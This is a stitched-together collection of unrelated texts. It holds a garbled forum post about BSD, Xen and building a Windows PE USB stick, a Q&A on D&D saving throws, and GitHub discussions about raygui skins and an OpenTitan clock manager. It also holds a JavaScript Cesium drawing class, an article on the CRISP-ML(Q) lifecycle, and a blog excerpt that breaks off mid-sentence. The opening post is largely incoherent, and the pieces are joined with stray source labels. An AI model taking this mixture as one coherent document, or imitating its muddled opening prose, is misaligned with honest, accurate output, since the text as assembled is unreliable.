Colleagues at NetBSD are having trouble compiling for the Raspberry Pi 4 (armhf), for instance, same as for the IoT thing (it needs two SD cards). OpenBSD *.fs images boot the kernel here but don't find the root partition afterwards, physically as well as in virtualization (on a writeable .ISO and not an .IMG for the USB). And I get 'broken library c++' on both i386 and amd64 images when trying to install a DM or even an XFCE desktop (there it is: pkg_add -uvi for updating the system) at the runtime of the whole graphical environment. Pity, pity...
NetBSD has good momentum where XEN development is concerned, and FreeBSD should be glad to have someone introduce the virtualization kernel into the main construct of booting (as primary, before the usual -CURRENTs flow out). Problems to be corrected in the mailing-list discussion concern a UIMMU issue or something quite similar; forgotten at the moment, hopefully not the age of the PC... XEN and BIOS do well together, UEFI is much trickier; Haiku OS boots nearly every MBR but needs an extra image for UEFI boots. They had something where my old BTX eyes lit up: a 1920x1280 screen, but with a blue sparkling line on the upper side (it probably costs the same amount of electricity as BTC mining, which is normally simply a fraud; I tried to bet as I felt tired and looked for adrenaline, lost 7 bucks, but it is the future!). Every kernel does a lot of crypto like Camellia, Heimdal, SHA-512, gzip compression and anti-theft/virus security options, and I guess that's about 10% of the booting progress. ACPIs are not standardized, which is what mobile customs lack; it leads to the many different "just for this one android" builds and makes spreading a CUSTOM difficult. Who has really done this is LineageOS and PixelOS; all others depend on the device and sometimes on the manufacturing date of the device.
So we get Amadrillis GPUs on Flint OS, Fuchsia OS, Fyde OS and the upcoming generation of mobile systems. If Google holds its hands on this any longer... with the kernel for Android they heard us and made it open source, which is why I never had problems with Android, only with the monopoly disaster in the OS market. And iOS is too impersonal, expensive and not even rootable. So the Pinephone with KDE Neon and Plasma is the only alternative at the moment.
In the meantime I re-compiled the 'HYPERVISOR hv' option into the kernel again (it had been thrown out for being hyper, to be treated with Ritalin), but it is still slow at scraping between VM and host, saving a snapshot and so on, with family-owned VMs but also with /opts like osX (old and rare).
The plasma5 and xfce4 updates were well done; I now have the sign of a certain comic on the desktop; the ability to have live 3D backgrounds grows, and Plasma itself too. I'm playing with thoughts of a Pinephone, but not being flush and setting it up myself = half the joy and 200$, hmmm, poor, poor girl. I had the Ubuntu phone and it was really amazing, but after two months the battery suddenly died.
The best thing I remember was when Gates told us that there would never be a Windows 11, only new build numbers. I thought, maybe the whole star is sinking, who knows? 30 years for a computer system is a whole epoch in computer ages, and Bill has become older now and a bit more moderate; maybe it has no consequences for what's upcoming anymore. I well remember the phase when I couldn't avoid seeing a Windows desktop at official companies, government offices, etc., and thought of slavery and school and things like this.
I now have FreeBSD 13 in daily use and as the main system for my notebook, which has once again been adopted with a new accumulator after 6 years of 24/7; I got it at the age of 5, thrown out of the M$ imperium as too old (what Windows eats in memory is really a resource killer; OS-ware is small and intelligent in the kernel as well as on all other runlevels, but doesn't always get the X immediately. I use the DRM driver but with modesetting, as the DRM flickers, giving some graphic errors sometimes.) And then "her" life started to grow. I've been at a BIOS update for weeks now, but I need a Windows boot USB; that, for us, is a doesn't-work-without thing.
To avoid getting win (version: whatever) on the physical SSD (but still no UEFI?), I tried a lot of things and apps: the Windows USB creator, Rufus, or an .APX for the brandmarked "Windows To Go" (no evaluation versions possible).
One USB stick was too slow and badly concepted; after waiting times of 15 hours I gave up. The other stick now contains the "Hiren's Boot CD", also known as a variant of the Windows PE; suddenly it can't be downloaded anymore (the download simply doesn't start, tried on 8 servers) since August 2020; typically MS, I thought.
So pirate-bay helped out a bit, not being illegal but having its grey circles around it. My experience showed me that using a simple thing like a squashfs is made over a .VMDK virtual image, but our VirtualBox has no extension pack (and it isn't planned, I guess, because of the frequent Xen development), though I think the standard bhyve hypervisor is on the way to finally losing in comparison to KVM.
... so USB can't be used, as protocol 1.1 hasn't been supported in VirtualBox since Vista anymore. So I used Linux on a USB stick for writing it down with the extension pack; the Windows sign arrived, but there was no turning of the "hour glass" after kernel boot, or a blank screen from the beginning onwards.
I manually copied the important files and the "install.wim" (those were the times when they had .CAB files for the sets), so it was simply a small picnic with an old enemy. You have to unpack the .zip to .iso and then make a virtual machine on a USB stick (you need two: one for a small Linux distro and host like MX Linux or antiX, and bring it to 'dd'); then add - under Debian or Ubuntu - the program WOEUSB (woeusbgui), check that the other stick, where the PE should arrive, isn't mounted (automounter!), and write the image down with the proggie (that fascinates me, btw.). Then there's some active-making (attribute 'a' in fdisk) with - guess now - grub, and the whole thing boots. Well done; seeding the torrent on KTorrent at the moment.
So if someone can help to make my machine show updated files on the console again, please don't hesitate to answer. Another problem: what do we call the thread here now? An admin should do it, but please without deleting my loooooong post here, plz.
Thx a lotta for a good and running and old and wise system, dear kernel-inventor,
|
OPCFW_CODE
|
Why is there a saving throw for each ability score?
From reading the current preview of the "Basic Rules" it looks like each ability score is now granted the possibility of being connected to a Saving Throw. In fact, certain classes get proficiency in saves for a given attribute, such as a Fighter getting proficiency in saves for STR and CON. So instead of Reflex/Fort/Will saves, we have a save for each ability score.
At first glance, I really like this idea. A spell should clearly be able to be "defended" by something other than just DEX/CON/WIS.
However, I looked through the existing spell list and all of the spells use only DEX/CON/WIS for saves.
What's going on here? Is this on purpose? Is this an oversight?
Why give Fighters proficiency in STR saves and then not print a single spell that uses that stat? (Note that Web appears to allow an STR "check" but not an STR "save" to escape, though this may be a mistake.)
My driver for this question was the oddity of inventing STR saves or INT saves and then not printing a single spell in the Basic set that used them. Based on the answers below, there are spells printed in the "playtest" set that do use these saves. So there is some reference material for what should be a STR save.
However, the answers below have even more and better information.
I'm voting to close this question as off-topic because designer-reasons questions are no longer allowed on RPG.SE.
Six saving throws instead of three is by design, intended to emphasize the ability scores, and new usages are likely to come up in future expansions.
Why
Associating saving throws with ability scores makes the scores more relevant, or at least come up a lot more often.
It has been six saving throws since the first playtest rules.
Quoting the transcript of an early seminar back in 2012:
Monte: We wanted to distill down the essence of D&D. We wanted to make sure that the ability scores and their modifiers had a big influence.
(...)
A couple of days ago I talked a little bit about how we want the core mechanic of the game to be the interaction between the DM and the player. And one of the great tools for that is the ability score.
(...)
Monte: Making a saving throw against something has become something that’s really a part of D&D.
So again, what we’ve done is tie those into the ability scores.
It has other benefits, such as fewer terms to learn and more varied defenses.
But the main reason to deviate from 3e and 4e, despite the costs, is likely for the reason quoted above.
Where
The playtest had spells that are not included in Basic, and among them you can find uses for the other three saving throws.
For example, Gust of Wind requires a Strength save, while Banishment and Holy Word ask for a Charisma save.
Apart from spells, monsters' abilities also call for saving throws.
For example, in the playtest the Mind Flayer's Mind Blast calls for an Intelligence saving throw from each victim.
Or the Water Elemental, when it pushes you, forces you to make a Strength saving throw.
Monsters are not included in Basic for the moment, but should be in the future.
There are also rumours that Intelligence saving throws will be used for psionics, which Mike Mearls appears to substantiate on Twitter:
The Snark Knight: @mikemearls What would be examples of Strength, Intelligence, or Charisma saving throws?
Mike Mearls: @SnarkKnight1 Strength save - resist a gust of wind or push effect
Mike Mearls: @SnarkKnight1 Int save - psionics when we do it
Mike Mearls: @SnarkKnight1 charisma - possession
Mike Mearls: @SnarkKnight1 I think this is an area where we will see more as designers get more used to the edition
Thank you, did not see playtest version, it's good to know they did print something that used them.
The stats for the wolf in the starter set use a Strength Save against being tripped, if I remember my session this weekend properly.
This isn't an oversight. Spells aren't the only thing that could possibly cause a saving throw.
Saving throws are written to be generally applicable, so that they can cover every possible situation and future rule. This provided a solid foundation upon which both official rules and home rulings can build, as it provides for making saving throws against any kind of effect imaginable.
There is a series of Mearls tweets from the past few days that indicate what the 3 that aren't currently used are good for: https://twitter.com/mikemearls/status/491048296983449601 https://twitter.com/mikemearls/status/491048177739382784 https://twitter.com/mikemearls/status/491048382748577792
The “why” is because there are indeed spells which target the other 3 saves.
There are many spells/attacks which target the 3 common saves (each class gets one): Con, Dex, Wis. There are very few spells which target the uncommon saves (each class also gets one of these too): Str, Int, Cha. I put together a list from the PHB and XGtE that I could find. I probably missed a few, but I wanted to share this effort for anyone interested (feel free to add spells to this list - probably better to keep monster attacks unspoiled). Note that some of these spells might have multiple effects. If any of them belonged on the lists, I included the spell.
Strength (push, pull)
Gust (XGtE, cantrip)
Ensnaring Strike (1)
Entangle (1)
Earthbind (XGtE, 2)
Gust of Wind (2)
Maximilian's Earthen Grasp (XGtE, 2)
Wind Wall (3)
Watery Sphere (XGtE, 4)
Wrath of Nature (XGtE, 5)
Telekinesis (5)
Tsunami (8)
Intelligence (psychic)
Phantasmal Force (2)
Synaptic Static (XGtE, 5)
Mental Prison (XGtE, 6)
Feeblemind (8)
Illusory Dragon (XGtE, 8)
Psychic Scream (XGtE, 9)
Charisma (personality, appearance, soul, banishment)
Bane (1)
Zone of Truth (2)
Banishment (4)
Hallow (5)
Planar Binding (5)
Seeming (5)
Magic Jar (6)
Plane Shift (7)
Temple of the Gods (XGtE, 7)
Despite Mike Mearls's comment noted in another answer, all of the charm/domination spells appear to target Wisdom. Charisma appears to only be used when something targets the very ego/soul/appearance of a being. I'm not sure why Polymorph would be Wisdom though. There might also be some balancing going on as well that is a more important criteria than the flavor.
|
STACK_EXCHANGE
|
I was once loosely attached to a team which had been given the job of modeling a particular industry. Let's say it was Insurance.
They were given some money and some offices, and told to go away and create an industry model, which could be used as the basis for customer solutions. One model for all aspects of the industry – think of the time it would save in creating solutions, and even more in integrating them together.
The first time I saw the model, it was going OK. They had 200-ish domain model classes, with things like Premiums and Customers, Policies and Payments, but lots of gaps which they just hadn’t had time to fill.
The second time, a few months later, it was up to 600+ classes. This model was now much more comprehensive, at least in the view of those who knew more about the industry than me. It had all the stuff from the first version, and a whole lot more. They looked to be nearly finished.
The final time, several months later, they had only just finished, and the model was visibly smaller. The pile of paper which was the printout of the model was a fraction of the size of the last one. Back to fewer than 200 classes. What happened?
We looked at the detail. We looked for Policy – the heart of any insurance system. No sign. We looked again, at about where it was the last time we looked. There was something unintelligible, called maybe Entity_Offering_Link – which, if the Entity is a Customer and the Offering is 'Insurance', then maybe is a policy.
So what had they done? They'd started out by modelling the terms they heard the experts use, then, like good modellers do, looked for common abstractions to make things simpler. And they went on and on, finding ever more abstract ideas to 'simplify' the model, until the 'Insurance-ness' disappeared altogether. Entity_Offering_Link could equally be an airline ticket, or an order placed at McDonalds. And links between things no longer had real names: all the 'stuff' was connected through a generic class, where the purpose of the link was soft-coded as a variable in the link. Super flexible. Super abstract.
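The difference is easy to see in code. A minimal sketch (all class and field names here are invented for illustration):

# Early, domain-flavoured model: the insurance-ness is in the names.
class Policy:
    def __init__(self, customer, premium, payments):
        self.customer = customer   # who is insured
        self.premium = premium     # what they pay
        self.payments = payments   # what they have paid

# Boiled-dry model: anything can link to anything.
class EntityOfferingLink:
    def __init__(self, entity, offering, link_purpose):
        self.entity = entity              # a Customer... or a passenger, or a diner
        self.offering = offering          # 'Insurance'... or a flight, or a burger
        self.link_purpose = link_purpose  # the meaning of the link, soft-coded as data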
Melting the Pan
If you’ve ever made stock for cooking, you know that you start out with all the ingredients, and a whole lot of water. What you want is the concentrated flavour, so you start to boil the mixture.
Gradually the water boils away, and you get to a rich, highly flavoured liquid, which has the concentrated essence of the initial ingredients. Then you stop boiling.
Because if you carry on, what happens is the liquid gets thick and gunky, and eventually goes dry, and finally you start to melt the pan. This isn't concentrated anything. It's a fire hazard.
So be aware when you do your solemn duty as a modeller and make abstractions. Don't get so cute that the essence of the model goes away. It must still have the 'stuff' which makes it an insurance or an airline or a restaurant model. It should not need a modelling expert to explain it to a domain expert.
So if you're managing such a team, beware of letting them model for too long. Get the model reviewed frequently by people who know the area but not the modelling style, and get it reviewed for style by a modelling expert, before it's too late and your stock tastes of melted metal.
|
OPCFW_CODE
|
The Machine Learning Lifecycle
Learn about the standard process for building sustainable machine learning applications.
There are no standard practices for building and managing machine learning (ML) applications. As a result, machine learning projects are not well organized, lack reproducibility, and are prone to complete failure in the long run. We need a model that helps us maintain quality, sustainability, robustness, and cost management throughout the ML life cycle.
Image by Author | Machine Learning Development Life Cycle Process
The Cross-Industry Standard Process for the development of Machine Learning applications with Quality assurance methodology (CRISP-ML(Q)) is an upgraded version of CRISP-DM to ensure quality ML products.
The CRISP-ML(Q) has six individual phases:
- Business and Data Understanding
- Data Preparation
- Model Engineering
- Model Evaluation
- Model Deployment
- Monitoring and Maintenance.
These phases require constant iteration and exploration to build better solutions. Even though the phases are ordered, the output of a later phase can determine whether we have to re-examine a previous phase or not.
Image by Author | Quality Assurance for Each Phase
The quality assurance methodologies are introduced to each phase of the framework. The methodology comes with requirements and constraints such as performance metrics, data quality requirements, and robustness. It helps mitigate the risk that affects the success of machine learning applications. It can be achieved by constant monitoring and maintaining the overall system.
For example: in an e-commerce business, data and concept drift will contribute to model degradation, and if we don't have a system in place to monitor these changes, the company will take a loss in the shape of lost customers.
Business and Data Understanding
At the start of the development process, we need to identify the scope of the project, success criteria, and feasibility of the ML application. After that, we start the process of data collection and quality verification. This process is long and challenging.
Scope: what do we want to achieve by using a machine learning process? Is it to retain customers or to reduce the cost of operations through automation?
Success Criteria: we have to define clear and measurable business, machine learning (statistical metric), and economic (KPI) success metrics.
Feasibility: we need to ensure data availability, the applicability of ML application, legal constraints, robustness, scalability, explainability, and resource demand.
Data Collection: gathering the data, versioning it for reproducibility, and ensuring a constant stream of real-life and generated data.
Data Quality Verification: ensuring the quality by maintaining data description, requirements, and verification.
To ensure quality and reproducibility, we need to document the statistical properties of data and the data generating process.
Data Preparation
The second phase is pretty much straightforward. We will be preparing the data for the modeling phase. It includes data selection, data cleaning, feature engineering, data augmentation, and normalization.
- We start with feature selection, data selection, and dealing with unbalanced classes (by over-sampling or under-sampling).
- Then, focusing on reducing noise and dealing with missing values. For quality assurance purposes, we will add data unit testing to mitigate faulty values.
- Depending on your model, we perform feature engineering and data augmentations, for example, one-hot encoding and clustering.
- Normalizing and scaling the data. It will mitigate the risk of biased features.
To ensure reproducibility, we create data modeling, transformation, and feature engineering pipelines.
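As an illustration, here is a minimal preprocessing-pipeline sketch using scikit-learn (the column names are invented):

from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, StandardScaler

# Numeric columns: fill missing values, then scale to mitigate biased features.
numeric = Pipeline([
    ("impute", SimpleImputer(strategy="median")),
    ("scale", StandardScaler()),
])

# Categorical columns: one-hot encode, ignoring unseen categories at inference time.
categorical = Pipeline([
    ("impute", SimpleImputer(strategy="most_frequent")),
    ("onehot", OneHotEncoder(handle_unknown="ignore")),
])

# One reusable, versionable preprocessing step for the whole dataset.
preprocess = ColumnTransformer([
    ("num", numeric, ["age", "order_value"]),
    ("cat", categorical, ["country", "device"]),
])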
Model Engineering
The constraints and the requirements of the Business and Data Understanding phase will determine the modeling phase. We need to understand the business problem and how we are going to develop machine learning models to solve it. We will be focusing on model selection, optimization, and training. We will be ensuring model performance metrics, robustness, scalability, explainability, and optimizing storage and compute resources.
- Research in model architecture and similar business problems
- Defining model performance metrics
- Model selection
- Understanding domain knowledge by incorporating experts.
- Model training
- Model compression and ensembling
To ensure quality and reproducibility, we will store and version model metadata such as model architecture, training and validation data, hyper-parameters, and environment description.
Finally, we will track ML experiments and create ML pipelines to create a repeatable training process.
Model Evaluation
It is the phase where we test and ensure that our model is ready for deployment.
- We will be testing the model performance on a test dataset.
- Assessing model robustness by providing random or false data.
- Improving model explainability to meet regulatory requirements.
- Comparing the result with initial success metrics automatically or by the domain expert.
For quality assurance, every step in the evaluation phase is recorded.
Model Deployment
The model deployment is a phase where we integrate the machine learning model into an existing system. The model can be deployed on a server, in a browser, in software, and on edge devices. The predictions from the models can be used in BI dashboards, APIs, web apps, and plugins.
The model deployment processes:
- Defining hardware inference
- Model evaluation in production
- Ensuring user acceptance and usability
- Providing fall back plan and minimizing losses
- Deployment strategy.
Monitoring and Maintenance
The model in production requires constant monitoring and maintenance. We will be monitoring model staleness, hardware performance, and software performance.
Continuous monitoring is the first part of the process, and if the performance drops below the threshold take an automatic decision to retrain the model on new data. Furthermore, the maintenance part is not limited to just model re-training. It involves decision-making to acquire new data, update hardware and software, and improve the ML process depending on the business use case.
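A minimal sketch of that retraining decision (the metric source and the threshold value are assumptions):

def trigger_retraining() -> None:
    # Hypothetical hook: in a real system this would kick off the training pipeline.
    print("Retraining triggered")

def check_and_retrain(live_metric: float, threshold: float = 0.85) -> bool:
    """Retrain when the monitored performance metric drops below the threshold."""
    if live_metric < threshold:
        trigger_retraining()
        return True
    return False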
In short, it is continuous integration, training, and deployment of ML models.
Training and validating models is a small part of an ML application. There are several processes involved in converting the initial idea into reality. In this post, we have learned about CRISP-ML(Q) and how it emphasizes risk assessment and quality assurance.
We start by defining the business objective, collecting and cleaning the data, building the model, validating it on a test dataset, and deploying it to production.
The key component of this framework is continuous monitoring and maintenance. We will monitor data, software, and hardware metrics to determine whether to re-train the model or upgrade the system.
If you are new to machine learning operations and want to learn more about it, read the review of the free MLOps course by DataTalks.Club. You will get hands-on experience in all 6 phases and learn about the real-life implementation of CRISP-ML.
- Towards CRISP-ML(Q): A Machine Learning Process Model with Quality Assurance Methodology (arxiv.org)
- CRISP-ML(Q) (ml-ops.org)
- Article Review: Towards CRISP-ML(Q)
Abid Ali Awan (@1abidaliawan) is a certified data scientist professional who loves building machine learning models. Currently, he is focusing on content creation and writing technical blogs on machine learning and data science technologies. Abid holds a Master's degree in Technology Management and a bachelor's degree in Telecommunication Engineering. His vision is to build an AI product using a graph neural network for students struggling with mental illness.
|
OPCFW_CODE
|
Skin support final implementation
Hey @raysan5, as stated in https://github.com/raysan5/raygui/pull/98, here is another pull request adding support for skinning. Compared to my previous attempt, this time I made sure to fix most of the bugs and also included a fully functional skin editor in /examples/ to make creating/editing skins a bit easier.
Here are some features:
supports almost all the raygui controls except GuiLine(), GuiGroupBox(), GuiLabel(), GuiGrid(), GuiLabelButton() and GuiDummyRec()
some controls have multiple sub-components (e.g. GuiListViewEx()); those can be skinned too
a skin file can hold multiple skin styles, this way one can have different skins for the menu GUI, ingame GUI etc. in the same file
support for saving/loading skins to/from a text file; the syntax resembles .rgs as much as possible
if useColor is enabled for a skin it can use the currently active color style
Using it in your code is quite easy, I think. Here's an example:
// Loading from a file
GuiSkin skins[4] = {0}; // create an empty array to hold our skins
int skinCount = GuiLoadSkin("test.skin", skins, 4); //load at most 4 skins from file
if(skinCount == 0) TraceLog(LOG_ERROR, "Failed to load skins!"); // handle failure
GuiSetSkin(&skins[0]); // set the first skin as the global skin
GuiButton(bounds, "Hello"); // render a button using the first skin
GuiSetSkin(&skins[1]);
GuiButton(bounds, "World"); // render a button using the second skin
// ....
// `GuiLoadSkin()` will automatically load a texture file but you can also use your own
GuiSetSkinTexture(mytexture); // now mytexture is the global gui texture.
// Saving a skin to file
GuiSaveSkin("test.skin", "texture.png", skins, 4); // Save 4 skins styles to file
Please try the editor to see more of what the current implementation can do!
I think this feature will benefit raygui greatly, so what do you say Ray :+1: or :-1:
PS: i don't know why d321a0b and 37f20a4 are in there :(
@Demizdor Wow! Really impressive! Congrats! This is a huge change for the library, I need some time to review it and decide...
In any case, thanks for this great feature and tool!
Sure thing, take your time; the update is huge and you'll need to maintain it in the future, so I fully understand.
Hey @raysan5 , i will close this!
The new raylib changes broke this code.
Some things are easy to fix, like getting rid of the #ifdef __unix__ hacks, adding the dot when calling GetExtension() in editor.c, and correcting DrawTextureNPatch() to use NPATCH_NINE_PATCH in raygui.h, but others are harder, like the newly patched GuiScrollPanel() that made drawing the edges not behave correctly.
I'm sure that if I had time everything would work once again, but I don't have time to fix things, so I believe this is the best way to handle all of this. Sorry!
Hi @Demizdor, it's ok, no need to be sorry. It was a big change and I haven't put much time into raygui lately. I also admit I felt a bit scared about maintaining it... No worries, the PR is here for future reference.
|
GITHUB_ARCHIVE
|
Integrate clkmgr
This is just a draft integration to see how things might look, and also to work through some of the kinks.
Once a PR like this one is merged, we can finally embark on the actual clock split and split things into real async domains.
@eunchan
I have not included your feedback on clkmgr yet, but I was wondering if you could have a look at how this might look when all integrated. I don't like how clock/reset handling is a bit different right now, so I'm going to go back and clean that up as part of a separate PR.
I'm not sure... I usually see these done manually. I feel like if there are none, the tool would probably throw some in.
Let me try later today or tomorrow, I'm kind of curious.
On Mon, May 4, 2020 at 7:31 PM Michael Schaffner wrote:
@msfschaffner approved this pull request.
Thanks @tjaychen https://github.com/tjaychen, looks good to me so far.
In util/topgen/merge.py
https://github.com/lowRISC/opentitan/pull/2084#discussion_r419830417:
for port, clk in ep['clock_srcs'].items():
ep_clks.append(clk)
if unique == "yes":
hier_name = clk_paths[src]
if src == 'ext':
# clock comes from the port and therefore have no
incomplete sentence?
In hw/top_earlgrey/rtl/clkgen_xil7series.sv
https://github.com/lowRISC/opentitan/pull/2084#discussion_r419832762:
@@ -72,15 +72,18 @@ module clkgen_xil7series (
.O (clk_fb_buf)
);
BUFG clk_50_bufg (
.I (clk_50_unbuf),
.O (clk_50_buf)
);
do we know whether the tool would insert them automatically if needed? in
that case we could remove them from this file...
@eunchan
@msfschaffner
I did some rebasing and minor lint fixes and addressed some comments; do you guys mind having one more look?
I'll follow-up with real asynchronous clocks and the clock naming fixes in a different PR.
Hey @tjaychen, I just made a PR that adds the CSR tests to the sanity (and hence the private CI). If you're okay with it, merge this in after ensuring that the CI is clean with the CSR tests having run. If not, that is fine as well.
sgtm, I'm almost positive it will break... since it will disable clocks. I'll probably need to add some exclusions.
@sriyerg
I've rebased and added exclusions. Do you mind taking a look to make sure I didn't add too blanket an exclusion? On another note, I think CI (private) might have gotten stuck again...
LGTM, thanks!
CI private is queued and is currently at the 5th spot. Looks ok to me.
Updates with private CI revealed that the exclusions done on pwrmgr and clkmgr were insufficient. The reset test itself can cause the device to hang.
thanks all for the review. I am merging this now.
|
GITHUB_ARCHIVE
|
class draw{
drawPoint=function (viewer, callback) {
var _this = this;
_this.viewer=viewer
// store the clicked coordinates
var positions = [];
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
// left click to draw a point
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
positions.push(cartesian);
_this.viewer.entities.add({
position: cartesian,
point: {
color: Cesium.Color.RED,
pixelSize: 5,
heightReference: Cesium.HeightReference.CLAMP_TO_GROUND
}
});
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
// right click to finish drawing points
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawLineString= function (viewer,callback) {
var _this = this;
_this.viewer=viewer
var PolyLinePrimitive = (function () {
function _(positions) {
this.options = {
polyline: {
show: true,
positions: [],
material: Cesium.Color.RED,
width: 3
}
};
this.positions = positions;
this._init();
}
_.prototype._init = function () {
var _self = this;
var _update = function () {
return _self.positions;
};
// update polyline.positions in real time
this.options.polyline.positions = new Cesium.CallbackProperty(_update, false);
_this.viewer.entities.add(this.options);
};
return _;
})();
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
var positions = [];
var poly = undefined;
// left click to add a vertex
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
if (positions.length == 0) {
positions.push(cartesian.clone());
}
positions.push(cartesian);
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
// mouse move updates the preview
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.endPosition, _this.viewer.scene.globe.ellipsoid);
if (positions.length >= 2) {
if (!Cesium.defined(poly)) {
poly = new PolyLinePrimitive(positions);
} else {
if (cartesian != undefined) {
positions.pop();
cartesian.y += (1 + Math.random());
positions.push(cartesian);
}
}
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
// right click to finish the line
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawPolygon= function (viewer,callback) {
var _this = this;
_this.viewer=viewer
var PolygonPrimitive = (function () {
function _(positions) {
this.options = {
name: 'polygon',
polygon: {
hierarchy: [],
perPositionHeight: true,
material: Cesium.Color.RED.withAlpha(0.4)
}
};
this.hierarchy = positions;
this._init();
}
_.prototype._init = function () {
var _self = this;
var _update = function () {
return _self.hierarchy;
};
// update polygon.hierarchy in real time
this.options.polygon.hierarchy = new Cesium.CallbackProperty(_update, false);
_this.viewer.entities.add(this.options);
};
return _;
})();
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
var positions = [];
var poly = undefined;
// left click to add a vertex
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
if (positions.length == 0) {
positions.push(cartesian.clone());
}
positions.push(cartesian);
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
// mouse move updates the preview
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.endPosition, _this.viewer.scene.globe.ellipsoid);
if (positions.length >= 2) {
if (!Cesium.defined(poly)) {
poly = new PolygonPrimitive(positions);
} else {
if (cartesian != undefined) {
positions.pop();
cartesian.y += (1 + Math.random());
positions.push(cartesian);
}
}
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
// right click to finish drawing
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawRect= function (viewer,callback) {
let _self = this;
_self.viewer=viewer
let pointsArr = [];
_self.shape = {
points: [],
rect: null,
entity: null
};
var tempPosition;
var handle = new Cesium.ScreenSpaceEventHandler(_self.viewer.scene.canvas);
// left click to set the rectangle corners
handle.setInputAction(function (click) {
tempPosition = _self.getPointFromWindowPoint(click.position);
// the picked point lies on the ellipsoid
if (tempPosition) {
if (_self.shape.points.length == 0) {
pointsArr.push(tempPosition);
_self.shape.points.push(_self.viewer.scene.globe.ellipsoid.cartesianToCartographic(tempPosition));
_self.shape.rect = Cesium.Rectangle.fromCartographicArray(_self.shape.points);
_self.shape.rect.east += 0.000001;
_self.shape.rect.north += 0.000001;
_self.shape.entity = _self.viewer.entities.add({
rectangle: {
coordinates: _self.shape.rect,
material: Cesium.Color.BLACK.withAlpha(0.4),
outline: true,
outlineWidth: 2,
outlineColor: Cesium.Color.RED,
height: 0
}
});
_self.bufferEntity = _self.shape.entity;
}
else {
handle.removeInputAction(Cesium.ScreenSpaceEventType.MOUSE_MOVE);
handle.removeInputAction(Cesium.ScreenSpaceEventType.LEFT_CLICK);
callback(pointsArr);
}
}
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
// mouse move resizes the rectangle
handle.setInputAction(function (movement) {
if (_self.shape.points.length == 0) {
return;
}
var moveEndPosition = _self.getPointFromWindowPoint(movement.endPosition);
// the picked point lies on the ellipsoid
if (moveEndPosition) {
pointsArr[1] = moveEndPosition;
_self.shape.points[1] = _self.viewer.scene.globe.ellipsoid.cartesianToCartographic(moveEndPosition);
_self.shape.rect = Cesium.Rectangle.fromCartographicArray(_self.shape.points);
if (_self.shape.rect.west == _self.shape.rect.east)
_self.shape.rect.east += 0.000001;
if (_self.shape.rect.south == _self.shape.rect.north)
_self.shape.rect.north += 0.000001;
_self.shape.entity.rectangle.coordinates = _self.shape.rect;
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
};
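// The original code calls getPointFromWindowPoint() but never defines it.
// A plausible implementation is sketched here (assumed, not from the original
// source): pick on the ellipsoid when no terrain is loaded, otherwise pick
// against the globe.
getPointFromWindowPoint=function (point) {
if (this.viewer.scene.terrainProvider.constructor.name === "EllipsoidTerrainProvider") {
return this.viewer.scene.camera.pickEllipsoid(point, this.viewer.scene.globe.ellipsoid);
}
var ray = this.viewer.scene.camera.getPickRay(point);
return this.viewer.scene.globe.pick(ray, this.viewer.scene);
};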
clearHandle=function (viewer) {
this.viewer=viewer
// remove all entities
this.viewer.entities.removeAll();
// remove the ImageryLayers that were loaded into cesium, if any were tracked
if (this.removeImageryLayers) {
for (var i = 0; i < this.removeImageryLayers.length; i++) {
this.viewer.imageryLayers.remove(this.removeImageryLayers[i]);
}
}
};
}
export default new draw()
|
STACK_EDU
|
Traffic pours on to I-280 as we head home. It always grinds to a halt at the same places, as people rush north, heading home from Stanford and Facebook. A curious feature of the Peninsula (that sliver of land west of the bay that is bracketed by Daly City to the north and San Jose to the south) is that company name is synonymous with town. Mountain View is Google, Palo Alto is Stanford (true, not a company like the others), Menlo Park is Facebook, Los Gatos is Netflix, and the list goes on. My distaste for a given company is now proportional to how much traffic it causes (for me anyway). So I curse Stanford as we drive towards the Palo Alto entrance ramp and am greeted with a river of glowing tail lights. So many people squeezed on to such a small spit of land, but I can't begrudge them too much. After all, it's a modern day boom, and I've come rushing here like everyone else.
But why have I come rushing here? (In my last post, I had left Vancouver and my post-doc to work at NEON). That remains the hardest question for me to answer about this whole journey. To be fair I had something of an ideal position at NEON. I was able to go to conferences, develop software, do exciting informatics work, my back wasn't against the wall with funding, I lived in a great location, and I worked with awesome people. So why did I leave? An entire bottle of Knob Creek went into that decision, and I'm still not sure I have clarity of thought (maybe another bottle of whiskey would help?). Here are some of the things that I did think about:
I weighed my options, stay at NEON or leave. My wife asked me which decision was most reversible if I was really unhappy. I realized that I could probably find a place in the world of scientific software again, but where I work now would only knock once, and if you didn't answer then they wouldn't knock again. Does the scientific community look down on industry experience? I'm not sure, but since I no longer harbor ideas of a tenure track job, it seems like the kind of role I'd be interested in academic science would be open to my varied career path (However that remains to be seen).
Much of what I really like about science is distributed now; it's on twitter, it's on github. I could still contribute to projects I believed in like Data Carpentry, Software Carpentry,
